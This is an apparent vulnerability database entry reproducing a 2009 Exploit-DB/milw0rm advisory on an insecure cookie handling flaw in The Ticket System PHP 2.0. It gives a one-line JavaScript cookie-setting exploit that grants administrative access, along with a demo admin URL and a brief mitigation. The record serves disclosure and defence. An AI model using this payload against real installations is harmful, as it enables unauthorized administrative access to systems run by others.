The Ticket System / The Ticket System PHP Version 2.0 Insecure Cookie Handling Vulnerability

vendor:

The Ticket System PHP

by:

TiGeR-Dz

7,5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: The Ticket System PHP

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mrcgiguy:the_ticket_system_php

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The Ticket System / The Ticket System PHP Version 2.0 Insecure Cookie Handling Vulnerability

The Ticket System / The Ticket System PHP Version 2.0 is vulnerable to an insecure cookie handling vulnerability. An attacker can exploit this vulnerability by setting a malicious cookie with the value 'ttc_admin=1%7Cadmin;path=/'. This will allow the attacker to gain administrative access to the application.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
The Ticket System / The Ticket System PHP Version 2.0 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:The Ticket System / The Ticket System PHP Version 2.0
Download:http://www.mrcgiguy.com/the_ticket_system.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="ttc_admin=1%7Cadmin;path=/";
----------------------------------------------------------------
Dem0
----
http://www.mrcgiguy.com/cgi-bin/tts-demo/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]